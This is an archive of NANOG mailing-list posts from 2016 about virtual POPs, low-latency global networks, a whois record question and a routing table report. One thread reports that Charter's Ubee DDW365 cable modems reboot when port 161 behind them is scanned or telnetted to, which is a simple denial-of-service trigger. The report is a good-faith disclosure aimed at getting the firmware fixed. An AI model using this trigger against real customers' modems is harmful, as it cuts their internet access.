http://thyme.rand.apnic.net/current/data-add-IANA > i regularly check the report for references to 20940 and I was digging in to these a bit and I noticed something odd: Comment: AfriNIC - http://www.afrinic.net Comment: The African & Indian Ocean Internet Registry Ref: https://whois.arin.net/rest/org/AFRINIC ReferralServer: whois://whois.afrinic.net ResourceLink: http://afrinic.net/en/services/whois-query OrgAbuseHandle: GENER11-ARIN <---- OrgAbuseName: Generic POC OrgAbusePhone: +230 4666616 OrgAbuseEmail: abusepoc at afrinic.net OrgAbuseRef: https://whois.arin.net/rest/poc/GENER11-ARIN <--- I followed OrgAbuseRef to ARIN and got this: "Do not use this information to contact AfriNIC for registration or business purposes." This registry record is confusing. Can you explain? Sorry, I must've have missed this class in Registry 101. Appreciated, and thanks! -M< From marco at paesani.it Wed Aug 24 08:30:24 2016 From: marco at paesani.it (Marco Paesani) Date: Wed, 24 Aug 2016 10:30:24 +0200 Subject: AS6661 Post LU Contact Message-ID: Please contact me off list. Thanks ! Kind regards, Marco Paesani Skype: mpaesani Mobile: +39 348 6019349 Success depends on the right choice ! Email: marco at paesani.it From mark.tinka at seacom.mu Wed Aug 24 08:57:42 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Wed, 24 Aug 2016 10:57:42 +0200 Subject: What's the meaning of virtual POP ? In-Reply-To: References: Message-ID: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> On 24/Aug/16 01:20, Yucong Sun wrote: > Thanks for the explanation. > > I understand on layer 2 or like william point out (on anything other than > IP) it make total sense. > > However on layer 3, with existing transit bandwith with said provider it > would be redudant. (Assume The one you wanted peer at site b is already > peering with your provider). The term "virtual PoP" is more commercial than it is technical. As William mentioned, you are providing services via someone else's infrastructure. It is between you and that other network to determine how much of their infrastructure you will depend on. But ultimately, the objective is for you to reduce your exposure in what you would consider a new venture that still needs some proofing. Mark. From gadit.arqam at gmail.com Wed Aug 24 15:13:56 2016 From: gadit.arqam at gmail.com (Arqam Gadit) Date: Wed, 24 Aug 2016 20:13:56 +0500 Subject: Managed global low latency network with any to any connectivity Message-ID: Hello guys, I am looking for a global network with: - lowest possible latency - lowest possible jitter (packet loss and latency variation) - lowest possible monetary cost The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost. Would appreciate if you guys can point me in the right direction. Thanks! Arqam From rod.beck at unitedcablecompany.com Tue Aug 23 22:51:27 2016 From: rod.beck at unitedcablecompany.com (Rod Beck) Date: Tue, 23 Aug 2016 22:51:27 +0000 Subject: What's the meaning of virtual POP ? In-Reply-To: References: , Message-ID: Yes, except it is done via Switched Ethernet and VLANs. The idea behind virtual peering. Your gear is in Amsterdam and someone gives you VLANs to LINX. - R. ________________________________ From: NANOG on behalf of William Herrin Sent: Wednesday, August 24, 2016 12:46 AM To: Yucong Sun Cc: NANOG Subject: Re: What's the meaning of virtual POP ? On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote: > I came across the idea of the virtual POP , but the website for them have > way too much jargon to me[1][2][3], can someone explain it like i'm five > (:-D)? A virtual Point Of Presence means that you provide services at a location via someone else's facilities. The classic example was extending a PRI for dialup modems inside a particular local calling area via a point-to-point T1 back to your modem bank somewhere else that would have been a long distance call for those customers. If you put a modem bank in their local calling area, it's a POP. If you extend the circuit from their local calling area back to your modem bank elsewhere, it's a virtual POP. Modern examples of virtual POPs are much fancier but it's the same basic idea. > 1. Is virtual POP basically a L2VPN? It can be. Depends on what service you're extending from the "virtual" location. > 2. Do such vPOP have guaranteed latency/bandwidth? Depends on what you're extending and how. > 3. Is that really useful? It can be. It can let you dip your toes in a market without a large up-front investment in equipment and backhaul. Regards, Bill Herrin -- William Herrin ................ herrin at dirtside.com bill at herrin.us Owner, Dirtside Systems ......... Web: Dirtside Systems www.dirtside.com Welcome! You are our 370,765 th guest. Dirtside builds ground systems and ground system software for the satellite and mobile communications industries. From sryan at arbor.net Wed Aug 24 15:20:09 2016 From: sryan at arbor.net (Ryan, Spencer) Date: Wed, 24 Aug 2016 15:20:09 +0000 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and constantly changes L3 hops for the best pathing. I've used the service at a few jobs and the product itself is quite good. Dealing with them for things like MACD's can be...frustrating. We've never had a location they couldn't service either directly or via another last mile carrier. Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com ________________________________ From: NANOG on behalf of Arqam Gadit Sent: Wednesday, August 24, 2016 11:13:56 AM To: nanog at nanog.org Subject: Managed global low latency network with any to any connectivity Hello guys, I am looking for a global network with: - lowest possible latency - lowest possible jitter (packet loss and latency variation) - lowest possible monetary cost The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost. Would appreciate if you guys can point me in the right direction. Thanks! Arqam From swmike at swm.pp.se Wed Aug 24 15:22:12 2016 From: swmike at swm.pp.se (Mikael Abrahamsson) Date: Wed, 24 Aug 2016 17:22:12 +0200 (CEST) Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: On Wed, 24 Aug 2016, Arqam Gadit wrote: > Hello guys, > > I am looking for a global network with: > > - lowest possible latency > - lowest possible jitter (packet loss and latency variation) > - lowest possible monetary cost > > The few providers I have talked to until now, they all provide a > point-to-point low latency link. However, what I am looking for is > any-to-any connectivity so I can get from one point to another in least > possible time and least possible cost. > > Would appreciate if you guys can point me in the right direction. The right direction is to decide what is most important to you. There is no network in the world that provides all of your criteria at once. Some people are paying really good money for low latency/PDV. Some other people are paying little money, but in return get low latency and PDV. So what's most important to you? Money or network characteristics? -- Mikael Abrahamsson email: swmike at swm.pp.se From rod.beck at unitedcablecompany.com Wed Aug 24 15:36:13 2016 From: rod.beck at unitedcablecompany.com (Rod Beck) Date: Wed, 24 Aug 2016 15:36:13 +0000 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: So you want point-to-multipoint which means Switched Ethernet. But ultra latency traders don't want the extra latency associated with Switched Ethernet. And they dominate the demand for ultra-low latency. Regards, Roderick. United Cable Company ________________________________ From: NANOG on behalf of Arqam Gadit Sent: Wednesday, August 24, 2016 5:13 PM To: nanog at nanog.org Subject: Managed global low latency network with any to any connectivity Hello guys, I am looking for a global network with: - lowest possible latency - lowest possible jitter (packet loss and latency variation) - lowest possible monetary cost The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost. Would appreciate if you guys can point me in the right direction. Thanks! Arqam From rod.beck at unitedcablecompany.com Wed Aug 24 15:45:05 2016 From: rod.beck at unitedcablecompany.com (Rod Beck) Date: Wed, 24 Aug 2016 15:45:05 +0000 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: , Message-ID: There are standard routes and there are low latency routes that serve mostly traders. The latter charge a big premium. He said the lowest possible latency. That is a specialty market where the SLAs are in microseconds, not milliseconds. Many carriers have a division for ultra low latency. Hibernia Atlantic built express which is just used by financial traders. No one else can afford it. And since low latency is the name of the game, it means waves or SDH or SONET. Not Ethernet switching. Regards, Roderick. ________________________________ From: NANOG on behalf of Ryan, Spencer Sent: Wednesday, August 24, 2016 5:20 PM To: Arqam Gadit; nanog at nanog.org Subject: Re: Managed global low latency network with any to any connectivity AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and constantly changes L3 hops for the best pathing. I've used the service at a few jobs and the product itself is quite good. Dealing with them for things like MACD's can be...frustrating. We've never had a location they couldn't service either directly or via another last mile carrier. Spencer Ryan | Senior Systems Administrator | sryan at arbor.net Arbor Networks +1.734.794.5033 (d) | +1.734.846.2053 (m) www.arbornetworks.com> ________________________________ From: NANOG on behalf of Arqam Gadit Sent: Wednesday, August 24, 2016 11:13:56 AM To: nanog at nanog.org Subject: Managed global low latency network with any to any connectivity Hello guys, I am looking for a global network with: - lowest possible latency - lowest possible jitter (packet loss and latency variation) - lowest possible monetary cost The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost. Would appreciate if you guys can point me in the right direction. Thanks! Arqam From SNaslund at medline.com Wed Aug 24 15:48:18 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Wed, 24 Aug 2016 15:48:18 +0000 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: <9578293AE169674F9A048B2BC9A081B401E6693D68@MUNPRDMBXA1.medline.com> This is kind of the holy grail of networks you are looking for. You have to be a lot more specific than global to really shop this. As far as I know (and I have looked a lot), there is not one network that can get you to most countries with the best performance. For example, China is a particular case of a limited number of carriers delivering the last mile. There are a lot of countries that also have nationalized monopolies that can't be avoided. Best idea is to put together an RFP listing the countries you are interested in with the SLA you want. Various providers are teamed with other providers to provide a complete solution but there will definitely be carriers stronger in certain regions. If you are talking about any-to-any connectivity on a global basis you are looking at an MPLS VPN type of network in order to deal with last mile transport over various providers. In my experience that is about the only way to get a real global any-to-any private network. Also, the old saying: "cheap, reliable, fast; pick any two" really applies in this case. Steven Naslund Chicago IL From: NANOG on behalf of Arqam Gadit Sent: Wednesday, August 24, 2016 5:13 PM To: nanog at nanog.org Subject: Managed global low latency network with any to any connectivity Hello guys, I am looking for a global network with: - lowest possible latency - lowest possible jitter (packet loss and latency variation) - lowest possible monetary cost The few providers I have talked to until now, they all provide a point-to-point low latency link. However, what I am looking for is any-to-any connectivity so I can get from one point to another in least possible time and least possible cost. Would appreciate if you guys can point me in the right direction. Thanks! Arqam From SNaslund at medline.com Wed Aug 24 16:01:22 2016 From: SNaslund at medline.com (Naslund, Steve) Date: Wed, 24 Aug 2016 16:01:22 +0000 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: , Message-ID: <9578293AE169674F9A048B2BC9A081B401E6693D8B@MUNPRDMBXA1.medline.com> The real issue in the request is that this person is looking for any-to-any connectivity which will require either a single L2 switching domain or a L3 routing domain. While waves, SDH, and SONET might be your layer one transport there are two major factors that are going to affect latency and jitter the most. 1. Geography - Any point to any point has a minimum latency due to simple mileage/medium constraints. You cannot possibly go any faster than the velocity of propagation over the media of your choice. For example, lowest latency at layer 1 would probably be P2P microwave (which has a faster velocity of propagation than light over fiber) but that would not be an effective way to cross the Pacific ocean. 2. Routing/Switching queuing latency - If you want real any to any connectivity you need routing or switching logic which takes time. For example, lowest latency at layer 1 would probably be P2P microwave (which has a faster velocity of propagation than fiber) but that would not be an effective way to cross the Pacific ocean. If you are doing an MPLS VPN architecture within the US, your routing/switching latency are probably going to be more significant than the layer one technology but when you go transoceanic your layer 1 latency becomes more significant. The differences in electrical, free RF or optical (like microwave), and optical over fiber will vary by something like 30-40% of the speed of light over the mileage of the link. The routing/switching of an any-to-any architecture will probably dwarf most of the differences in media. Steven Naslund Chicago IL -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Rod Beck Sent: Wednesday, August 24, 2016 10:45 AM To: Ryan, Spencer; Arqam Gadit; nanog at nanog.org Subject: Re: Managed global low latency network with any to any connectivity There are standard routes and there are low latency routes that serve mostly traders. The latter charge a big premium. He said the lowest possible latency. That is a specialty market where the SLAs are in microseconds, not milliseconds. Many carriers have a division for ultra low latency. Hibernia Atlantic built express which is just used by financial traders. No one else can afford it. And since low latency is the name of the game, it means waves or SDH or SONET. Not Ethernet switching. Regards, Roderick. From craetdave at gmail.com Wed Aug 24 17:27:52 2016 From: craetdave at gmail.com (Dave Cohen) Date: Wed, 24 Aug 2016 13:27:52 -0400 Subject: What's the meaning of virtual POP ? In-Reply-To: References: Message-ID: <4CB800FD-3015-49E7-9C9A-FBF88328846E@gmail.com> The key is really that it could mean different things for different providers, although I would agree that the gist is that the location is enabled to look and feel like a POP without the provider installing the full complement of requisite hardware. A provider I worked at in the past, for example, defined a virtual POP as a non-POP location at which POP pricing was offered - the actual method of delivery there being both irrelevant to it being defined that way and unimportant to the concept as a whole. It let the company be price-competitive with others that may have made more extensive investments in hardware at higher-demand locations, and it was purely based on a business justification. There was no specific technical definition (although in reality we were transparent with our customers about methodology anyway) - this contrasts with other providers that are clearly using it in a way that does define a technical approach. It's just an approach specific to that provider. > On Aug 23, 2016, at 6:51 PM, Rod Beck wrote: > > Yes, except it is done via Switched Ethernet and VLANs. The idea behind virtual peering. Your gear is in Amsterdam and someone gives you VLANs to LINX. > > > - R. > > > ________________________________ > From: NANOG on behalf of William Herrin > Sent: Wednesday, August 24, 2016 12:46 AM > To: Yucong Sun > Cc: NANOG > Subject: Re: What's the meaning of virtual POP ? > >> On Tue, Aug 23, 2016 at 6:31 PM, Yucong Sun wrote: >> I came across the idea of the virtual POP , but the website for them have >> way too much jargon to me[1][2][3], can someone explain it like i'm five >> (:-D)? > > A virtual Point Of Presence means that you provide services at a > location via someone else's facilities. > > The classic example was extending a PRI for dialup modems inside a > particular local calling area via a point-to-point T1 back to your > modem bank somewhere else that would have been a long distance call > for those customers. If you put a modem bank in their local calling > area, it's a POP. If you extend the circuit from their local calling > area back to your modem bank elsewhere, it's a virtual POP. > > Modern examples of virtual POPs are much fancier but it's the same basic idea. > > >> 1. Is virtual POP basically a L2VPN? > > It can be. Depends on what service you're extending from the "virtual" location. > > >> 2. Do such vPOP have guaranteed latency/bandwidth? > > Depends on what you're extending and how. > > >> 3. Is that really useful? > > It can be. It can let you dip your toes in a market without a large > up-front investment in equipment and backhaul. > > Regards, > Bill Herrin > > > -- > William Herrin ................ herrin at dirtside.com bill at herrin.us > Owner, Dirtside Systems ......... Web: > Dirtside Systems > www.dirtside.com > Welcome! You are our 370,765 th guest. Dirtside builds ground systems and ground system software for the satellite and mobile communications industries. > > From volists at staff.velocityonline.net Wed Aug 24 18:46:30 2016 From: volists at staff.velocityonline.net (Velocity Lists) Date: Wed, 24 Aug 2016 14:46:30 -0400 Subject: XO routing issue? Message-ID: I am looking for an XO contact, I appear to be having a routing issue with my traffic going through their network. Velocity Online 850-205-4638 From gadit.arqam at gmail.com Wed Aug 24 19:34:01 2016 From: gadit.arqam at gmail.com (Arqam Gadit) Date: Thu, 25 Aug 2016 00:34:01 +0500 Subject: Managed global low latency network with any to any connectivity In-Reply-To: References: Message-ID: Thanks for the input everyone :) @Mikael, Roderick, Unlike HFT and financial markets, the applications we have to support are not microsecond-sensitive. Infact, a +-10ms difference from 'least possible' is acceptable provided that the connection is stable. So basically I am looking for most cost-effective ways to achieve that using existing products/services. @Ryan, I'll get in touch with AT&T guys. Thanks! Arqam On Wed, Aug 24, 2016 at 8:45 PM, Rod Beck wrote: > There are standard routes and there are low latency routes that serve > mostly traders. The latter charge a big premium. He said the lowest > possible latency. That is a specialty market where the SLAs are in > microseconds, not milliseconds. Many carriers have a division for ultra low > latency. Hibernia Atlantic built express which is just used by financial > traders. No one else can afford it. And since low latency is the name of > the game, it means waves or SDH or SONET. Not Ethernet switching. > > > Regards, > > > Roderick. > > > ------------------------------ > *From:* NANOG on behalf of Ryan, Spencer < > sryan at arbor.net> > *Sent:* Wednesday, August 24, 2016 5:20 PM > *To:* Arqam Gadit; nanog at nanog.org > *Subject:* Re: Managed global low latency network with any to any > connectivity > > AT&T's AVPN product (Layer 3 VPN/"MPLS") does any-any routing and > constantly changes L3 hops for the best pathing. > > > I've used the service at a few jobs and the product itself is quite good. > Dealing with them for things like MACD's can be...frustrating. > > > We've never had a location they couldn't service either directly or via > another last mile carrier. > > > Spencer Ryan | Senior Systems Administrator | sryan at arbor.net< > mailto:sryan at arbor.net > > Arbor Networks > +1.734.794.5033 (d) | +1.734.846.2053 (m) > www.arbornetworks.com > > > ________________________________ > From: NANOG on behalf of Arqam Gadit < > gadit.arqam at gmail.com> > Sent: Wednesday, August 24, 2016 11:13:56 AM > To: nanog at nanog.org > Subject: Managed global low latency network with any to any connectivity > > Hello guys, > > I am looking for a global network with: > > - lowest possible latency > - lowest possible jitter (packet loss and latency variation) > - lowest possible monetary cost > > The few providers I have talked to until now, they all provide a > point-to-point low latency link. However, what I am looking for is > any-to-any connectivity so I can get from one point to another in least > possible time and least possible cost. > > Would appreciate if you guys can point me in the right direction. > > Thanks! > > Arqam > From me at anuragbhatia.com Wed Aug 24 22:20:13 2016 From: me at anuragbhatia.com (Anurag Bhatia) Date: Wed, 24 Aug 2016 22:20:13 +0000 Subject: Cisco Nexus vPC-VOIP Issues In-Reply-To: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net> References: <39495a84-08b6-5b77-5c5b-d15f5a77b565@lodpp.net> Message-ID: Hi Santosh Likely it's disabled arp across broadcast (assuming both servers are on same broadcast domain). One can comment on it after looking at config of the port. I have seen similar case in some hosting providers who run shared vlans across customers and they block direct traffic among those servers. They usually put a static route of that pool towards gateway. So e.g you have router on 10.10.10.1 and server 1 on 10.10.10.10, server 2 on 10.10.10.20. Now if direct layer 2 traffic is not allowed by tweaking broadcast domain, then you can route traffic from say server 1 (10.10.10.10) needs to speak to server 2 (10.10.10.20) then you can put 10.10.10.0/24 static via 10.10.10.1. Whether or not that's a good idea depends heavily on the use case. I hope this will help. On Mon 15 Aug, 2016, 17:26 nico nanog, wrote: > Hello, > > I cannot see any image in attachment. > > If you can ping from outside and not between them, wild guess it's not a > L2 pbm. > > Are you able to see the arp of srv2 from srv1 ( and vice-versa ) > > Without more info ( or it's maybe on the image I cannot see ) I would > look in ACL somewhere/firewall on srv > > > Rgd, > Nico > > > On 08/14/2016 11:59 PM, sathish kumar Ippani wrote: > > Hello All, > > > > Thank you all in advance. > > > > We have connected two nexus 3048 Switches and two l2 Switches as below > > using vPC and LACP. > > > > We have not seen any issues apart from one of VOIP server connected to > > Switch 1 has lost access to VOIP Server connected Switch 2 and vice > versa. > > > > Where I am able to ping both from Global. Can you please let me know what > > is went wrong here. > > > > > > [image: Inline image 2] > > > > > -- > Try and fail but never fail to try > > -- Anurag Bhatia http://anuragbhatia.com From Dave.Siegel at level3.com Wed Aug 24 16:59:43 2016 From: Dave.Siegel at level3.com (Siegel, David) Date: Wed, 24 Aug 2016 16:59:43 +0000 Subject: What's the meaning of virtual POP ? In-Reply-To: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> Message-ID: <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com> Different providers use the term with different definitions, but this is how we use it: At Level 3, a VPOP is a POP that we operate under someone else's license. For example, we have VPOPs in a number of markets throughout the Asia Pacific region, including countries like China, Vietnam, Indonesia, and others. We are buying a service from a partner that has an operating license in that country where they provide routers, entrance facilities, colo and other related infrastructure items, but we otherwise operate it as a full POP. It's in our OSS/BSS systems like any other location. As far as our customers can tell, there is nothing virtual about it. It looks like any other node on our network, so the distinction is purely internal to our company and how we have to manage support for the site. Dave -----Original Message----- From: NANOG [mailto:nanog-bounces at nanog.org] On Behalf Of Mark Tinka Sent: Wednesday, August 24, 2016 2:58 AM To: Yucong Sun ; Rod Beck ; William Herrin Cc: NANOG Subject: Re: What's the meaning of virtual POP ? On 24/Aug/16 01:20, Yucong Sun wrote: > Thanks for the explanation. > > I understand on layer 2 or like william point out (on anything other > than > IP) it make total sense. > > However on layer 3, with existing transit bandwith with said provider > it would be redudant. (Assume The one you wanted peer at site b is > already peering with your provider). The term "virtual PoP" is more commercial than it is technical. As William mentioned, you are providing services via someone else's infrastructure. It is between you and that other network to determine how much of their infrastructure you will depend on. But ultimately, the objective is for you to reduce your exposure in what you would consider a new venture that still needs some proofing. Mark. From randy at psg.com Thu Aug 25 09:10:20 2016 From: randy at psg.com (Randy Bush) Date: Thu, 25 Aug 2016 18:10:20 +0900 Subject: What's the meaning of virtual POP ? In-Reply-To: <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com> References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com> Message-ID: > At Level 3, a VPOP is a POP that we operate under someone else's > license. For example, we have VPOPs in a number of markets throughout > the Asia Pacific region, including countries like China, Vietnam, > Indonesia, and others. We are buying a service from a partner that > has an operating license in that country where they provide routers, > entrance facilities, colo and other related infrastructure items, but > we otherwise operate it as a full POP. It's in our OSS/BSS systems > like any other location. how does this work for mpls vpn based services across continent/country? i.e. are there inter-provider mpls vpn issues? randy From mark.tinka at seacom.mu Thu Aug 25 09:32:22 2016 From: mark.tinka at seacom.mu (Mark Tinka) Date: Thu, 25 Aug 2016 11:32:22 +0200 Subject: What's the meaning of virtual POP ? In-Reply-To: References: <54595aaa-7f52-1b71-9520-de38be893aaa@seacom.mu> <970945E55BFD8C4EA4CAD74B647A9DC0DE030115@USIDCWVEMBX08.corp.global.level3.com> Message-ID: On 25/Aug/16 11:10, Randy Bush wrote: > > how does this work for mpls vpn based services across continent/country? > i.e. are there inter-provider mpls vpn issues? Interestingly, being a relatively young player in the MPLS space, we see Africa slowly moving away from typical l3vpn services as more countries/cities/metros get fibre, as a result of businesses moving their IT infrastructure into some kind of cloud. It's not happening quickly, but it is happening, and I think what the SD-WAN (yet another buzz word) boys are doing will only accelerate the process. That has meant that the only progressive inter-provider MPLS NNI's we are seeing in/for the region are l2vpn's, and despite all the promises of BGP-driven l2vpn NNI's, I'd say all the l2vpn NNI's we are setting up are simple back-to-back VLAN's. Can't possibly mess those up :-). Mark. From gkuri at ieee.org Thu Aug 25 05:39:23 2016 From: gkuri at ieee.org (Gabriel Kuri) Date: Wed, 24 Aug 2016 22:39:23 -0700 Subject: Charter HFC Engineer? Message-ID: Any Charter HFC engineers on the list? I've been hitting my head on the wall with first tier support that involves the Ubee DDW365 cable modem Charter deploys that reboots when IP space sitting behind the cable modem is port scanned on port 161 (snmp). This all started when my original cable modem (SMC) was swapped out with the Ubee and I noticed the Internet would randomly go out during the day for about a minute or two and tracked it down to the Ubee modem rebooting throughout the day (lights flashing on the modem indicating boot up). A tech came out and swapped it with another Ubee, and the same issue, random reboots. After researching this issue, I found a post from April 2016 ( http://www.dslreports.com/forum/r30695574-Remote-triggered-modem-reboot) by someone posting about port scanning through the Ubee cable modem and the port scan causing the Ubee to reboot when it hit port 161. Apparently this person wasn't able to get through to Charter tech support about the problem either and gave up. After reading this post, I was able to confirm my Ubee was susceptible to this bug and would reboot by simply telneting to IP space on port 161 behind the modem. I figured my random reboots were related to random people port scanning my IP space throughout the day. I called support to let them know and got them to bump it up to their manager, who then referred it to a "technical specialist" that ended up blocking port 161 on my cable modem. That fixed the problem with the random reboots and my connection is now stable! However support seems to think blocking the port on my modem is a long term fix :( They don't seem to understand that the long term fix should be escalating this up the chain so an appropriate engineer can work with Ubee to get the firmware fixed in the modem or the tens of thousands (or millions?) of other Charter customers with this modem currently suffering through unstable Internet. And what's to stop someone from continuously port scanning all of the Charter IP space and essentially DOSing those customers with this Ubee modem? I'd appreciate if someone from Charter would contact me off list please, I have zero confidence this is actually going to get fixed the right way for myself or at all for all the other Charter customers with the Ubee modem deployed. Thanks ... From jared at puck.nether.net Thu Aug 25 16:27:38 2016 From: jared at puck.nether.net (Jared Mauch) Date: Thu, 25 Aug 2016 12:27:38 -0400 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: > On Aug 25, 2016, at 1:39 AM, Gabriel Kuri wrote: > > I'd appreciate if someone from Charter would contact me off list please, I > have zero confidence this is actually going to get fixed the right way for > myself or at all for all the other Charter customers with the Ubee modem > deployed. Have hope, I suspect someone will respond. (Can you send me your IP address off-list, I?d like to check against the OpenSNMPProject dataset as well). I?ve seen something similar with the Netgear device that Comcast Business deploys. It followed device swaps but I think it?s related to internal traffic vs external and have not yet chased down what triggers it. - jared From Edwin.Mallette at charter.com Thu Aug 25 17:41:49 2016 From: Edwin.Mallette at charter.com (Mallette, Edwin J) Date: Thu, 25 Aug 2016 17:41:49 +0000 Subject: Charter HFC Engineer? In-Reply-To: References: Message-ID: Hi Gabriel, I?m going to contact you off-list regarding this one. Ed On 8/25/16, 1:39 AM, "NANOG on behalf of Gabriel Kuri" wrote: >Any Charter HFC engineers on the list? I've been hitting my head on the >wall with first tier support that involves the Ubee DDW365 cable modem >Charter deploys that reboots when IP space sitting behind the cable modem >is port scanned on port 161 (snmp). > >This all started when my original cable modem (SMC) was swapped out with >the Ubee and I noticed the Internet would randomly go out during the day >for about a minute or two and tracked it down to the Ubee modem rebooting >throughout the day (lights flashing on the modem indicating boot up). A >tech came out and swapped it with another Ubee, and the same issue, random >reboots. After researching this issue, I found a post from April 2016 ( >http://www.dslreports.com/forum/r30695574-Remote-triggered-modem-reboot) >by >someone posting about port scanning through the Ubee cable modem and the >port scan causing the Ubee to reboot when it hit port 161. Apparently this >person wasn't able to get through to Charter tech support about the >problem >either and gave up. After reading this post, I was able to confirm my Ubee >was susceptible to this bug and would reboot by simply telneting to IP >space on port 161 behind the modem. I figured my random reboots were >related to random people port scanning my IP space throughout the day. I >called support to let them know and got them to bump it up to their >manager, who then referred it to a "technical specialist" that ended up >blocking port 161 on my cable modem. > >That fixed the problem with the random reboots and my connection is now >stable! However support seems to think blocking the port on my modem is a >long term fix :( > >They don't seem to understand that the long term fix should be escalating >this up the chain so an appropriate engineer can work with Ubee to get the >firmware fixed in the modem or the tens of thousands (or millions?) of >other Charter customers with this modem currently suffering through >unstable Internet. And what's to stop someone from continuously port >scanning all of the Charter IP space and essentially DOSing those >customers >with this Ubee modem? > >I'd appreciate if someone from Charter would contact me off list please, I >have zero confidence this is actually going to get fixed the right way for >myself or at all for all the other Charter customers with the Ubee modem >deployed. > >Thanks ... From cscora at apnic.net Fri Aug 26 18:01:43 2016 From: cscora at apnic.net (Routing Analysis Role Account) Date: Sat, 27 Aug 2016 04:01:43 +1000 (AEST) Subject: Weekly Routing Table Report Message-ID: <20160826180143.4B199A7543@thyme.apnic.net> This is an automated weekly mailing describing the state of the Internet Routing Table as seen from APNIC's router in Japan. The posting is sent to APOPS, NANOG, AfNOG, AusNOG, SANOG, PacNOG, SAFNOG, SdNOG, BJNOG, CaribNOG and the RIPE Routing WG. Daily listings are sent to bgp-stats at lists.apnic.net For historical data, please see http://thyme.rand.apnic.net. If you have any comments please contact Philip Smith . Routing Table Report 04:00 +10GMT Sat 27 Aug, 2016 Report Website: http://thyme.rand.apnic.net Detailed Analysis: http://thyme.rand.apnic.net/current/ Analysis Summary ---------------- BGP routing table entries examined: 607095 Prefixes after maximum aggregation (per Origin AS): 219681 Deaggregation factor: 2.76 Unique aggregates announced (without unneeded subnets): 297227 Total ASes present in the Internet Routing Table: 54680 Prefixes per ASN: 11.10 Origin-only ASes present in the Internet Routing Table: 36409 Origin ASes announcing only one prefix: 15436 Transit ASes present in the Internet Routing Table: 6505 Transit-only ASes present in the Internet Routing Table: 175 Average AS path length visible in the Internet Routing Table: 4.4 Max AS path length visible: 54 Max AS path prepend of ASN ( 55644) 51 Prefixes from unregistered ASNs in the Routing Table: 60 Unregistered ASNs in the Routing Table: 15 Number of 32-bit ASNs allocated by the RIRs: 15209 Number of 32-bit ASNs visible in the Routing Table: 11766 Prefixes from 32-bit ASNs in the Routing Table: 46579 Number of bogon 32-bit ASNs visible in the Routing Table: 37 Special use prefixes present in the Routing Table: 0 Prefixes being announced from unallocated address space: 391 Number of addresses announced to Internet: 2824316388 Equivalent to 168 /8s, 87 /16s and 165 /24s Percentage of available address space announced: 76.3 Percentage of allocated address space announced: 76.3 Percentage of available address space allocated: 100.0 Percentage of address space in use by end-sites: 98.2 Total number of prefixes smaller than registry allocations: 197226 APNIC Region Analysis Summary ----------------------------- Prefixes being announced by APNIC Region ASes: 155901 Total APNIC prefixes after maximum aggregation: 42905 APNIC Deaggregation factor: 3.63 Prefixes being announced from the APNIC address blocks: 169138 Unique aggregates announced from the APNIC address blocks: 68513 APNIC Region origin ASes present in the Internet Routing Table: 5191 APNIC Prefixes per ASN: 32.58 APNIC Region origin ASes announcing only one prefix: 1169 APNIC Region transit ASes present in the Internet Routing Table: 935 Average APNIC Region AS path length visible: 4.7 Max APNIC Region AS path length visible: 54 Number of APNIC region 32-bit ASNs visible in the Routing Table: 2326 Number of APNIC addresses announced to Internet: 759521092 Equivalent to 45 /8s, 69 /16s and 95 /24s APNIC AS Blocks 4608-4864, 7467-7722, 9216-10239, 17408-18431 (pre-ERX allocations) 23552-24575, 37888-38911, 45056-46079, 55296-56319, 58368-59391, 63488-64098, 64297-64395, 131072-137529 APNIC Address Blocks 1/8, 14/8, 27/8, 36/8, 39/8, 42/8, 43/8, 49/8, 58/8, 59/8, 60/8, 61/8, 101/8, 103/8, 106/8, 110/8, 111/8, 112/8, 113/8, 114/8, 115/8, 116/8, 117/8, 118/8, 119/8, 120/8, 121/8, 122/8, 123/8, 124/8, 125/8, 126/8, 133/8, 150/8, 153/8, 163/8, 171/8, 175/8, 180/8, 182/8, 183/8, 202/8, 203/8, 210/8, 211/8, 218/8, 219/8, 220/8, 221/8, 222/8, 223/8, ARIN Region Analysis Summary ---------------------------- Prefixes being announced by ARIN Region ASes: 183189 Total ARIN prefixes after maximum aggregation: 89394 ARIN Deaggregation factor: 2.05 Prefixes being announced from the ARIN address blocks: 188747 Unique aggregates announced from the ARIN address blocks: 88085 ARIN Region origin ASes present in the Internet Routing Table: 16218 ARIN Prefixes per ASN: 11.64 ARIN Region origin ASes announcing only one prefix: 5713 ARIN Region transit ASes present in the Internet Routing Table: 1717 Average ARIN Region AS path length visible: 3.8 Max ARIN Region AS path length visible: 23 Number of ARIN region 32-bit ASNs visible in the Routing Table: 1423 Number of ARIN addresses announced to Internet: 1105550048 Equivalent to 65 /8s, 229 /16s 